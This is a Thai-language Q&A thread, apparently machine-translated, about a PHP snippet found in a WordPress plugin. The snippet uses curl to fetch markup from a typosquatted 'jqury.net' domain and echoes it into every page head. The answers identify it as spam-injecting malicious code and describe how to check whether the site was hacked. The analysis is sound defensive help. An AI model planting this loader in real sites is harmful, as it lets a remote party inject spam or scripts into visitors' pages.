ฉันพบสิ่งนี้ในปลั๊กอิน มันทำอะไร? มันอันตรายไหม

ฉันพบสิ่งนี้ในปลั๊กอิน มันทำอะไร? มันอันตรายไหม

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

มันโหลดบล็อกมาร์กอัปที่มีสแปม (ฉันคิดถึงการโพสต์แหล่งข้อมูลเล็กน้อย แต่ฉันไม่ต้องการโฆษณาเนื้อหาในทางใดทางหนึ่ง) จากโดเมนที่เป็นการสะกดผิดโดเมนhttp://jquery.com/- - ใช้โดย jQuery ซึ่งเป็นห้องสมุด Javascript ที่มีชื่อเสียงและได้รับความนิยมและเป็นหนึ่งใน WordPress ที่รวมอยู่ใน Core ฉันคิดว่าความคิดที่จะปรากฏขึ้นกำลังโหลดไลบรารีนั้นเมื่อจริง ๆ แล้วโหลดสิ่งที่แตกต่างกันมาก

และเป็นวิธีอื่นที่พยายามจะโหลด jQuery $jqueryขอให้สังเกตชื่อตัวแปร

อาจพยายามโหลดสคริปต์ที่เป็นอันตรายเช่นกัน ฉันไม่ได้ตรวจสอบ ฉันจะเรียกมันว่าอันตรายโดยเฉพาะอย่างยิ่งเนื่องจากเนื้อหาในหน้านั้นสามารถเปลี่ยนแปลงได้ทุกเมื่อที่ผู้ควบคุมโดเมนรู้สึกเช่นนั้น

อย่างดีที่สุดมันจะทำให้เว็บไซต์ของคุณเสียหายเนื่องจากเครื่องมือค้นหาดูถูกเว็บไซต์ที่แพร่กระจายสแปม

อย่าใช้มัน ไม่เป็นประโยชน์ต่อคุณหรือผู้อื่นบนเว็บนอกเหนือจากผู้ใช้งานเว็บไซต์ หากคุณพบสิ่งนี้ในเว็บไซต์ที่มีชื่อเสียงรายงานให้พวกเขา

ใช่มันเป็นรหัสอันตรายโหลดเนื้อหาจากเว็บไซต์สแปม

คุณไม่ได้ตั้งชื่อปลั๊กอิน แต่ถ้าคุณพบรหัสนี้หลังจากติดตั้งบนเว็บไซต์ของคุณเป็นไปได้ว่ารหัสปลั๊กอินไม่ได้มาจากผู้พัฒนาเช่นนี้ แต่ถูกแฮ็กแทนหลังจากติดตั้งแล้ว หากเป็นกรณีนี้คุณอาจพบโค้ดอันตรายบนเว็บไซต์ของคุณมากกว่าปลั๊กอินนี้

ตรวจสอบรหัสปลั๊กอินที่ดาวน์โหลดมาจากทุกที่ที่คุณมีปลั๊กอินมา แต่เดิมและดูว่ามีรหัสที่เป็นอันตรายนี้หรือไม่ หากไม่แสดงว่าไซต์ของคุณถูกแฮ็ก หากคุณพิจารณาว่าจะเป็นกรณีที่อ่านบทความนี้จาก Codex